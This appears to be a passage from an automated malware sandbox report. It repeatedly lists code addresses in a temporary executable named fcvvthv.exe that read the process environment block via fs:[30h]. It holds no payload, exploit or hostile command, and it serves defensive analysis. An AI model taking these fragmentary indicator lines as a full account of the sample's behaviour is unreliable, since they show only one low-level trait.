          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A7A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A7A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A7A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A7A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00B24015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00B24015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00AD7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00AD7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00AD7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00B12073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00B21074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A70050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A70050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00AD69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00AD51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00AD51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00AD51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00AD51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00B149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00B149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00B149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00B149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A7C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A8A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A82990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A5B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A5B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A5B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00AE41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A74120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A74120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A74120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A74120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A74120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A8513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A8513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A59100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A59100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A59100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A5C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A5B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A5B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A7B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A7B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A6AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A6AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A8FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A8D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A8D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A82AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A82ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A94A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A94A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00B1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00B1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A68A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A5AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A5AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A55210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A55210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A55210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A55210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A73A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00B0B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00B0B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00B28A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A9927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00B1EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A59240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A59240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A59240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A59240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00AE4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A84BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A84BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A84BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00B25BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A61B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A61B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00B0D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A8B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00B1138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A82397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A7DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00AD53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00AD53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00B1131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A5DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 3_2_00A83B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A83B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A5DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B28B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A5F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A6849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B114FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B28CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AEC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AEC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A835A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A81DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A81DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A81DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A82581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A82581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A82581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A82581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B08DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A6D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A6D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B28D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B1E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A84D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A84D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A84D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A5AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00ADA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A93D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD3540 mov eax, dword ptr fs:[00000030h]
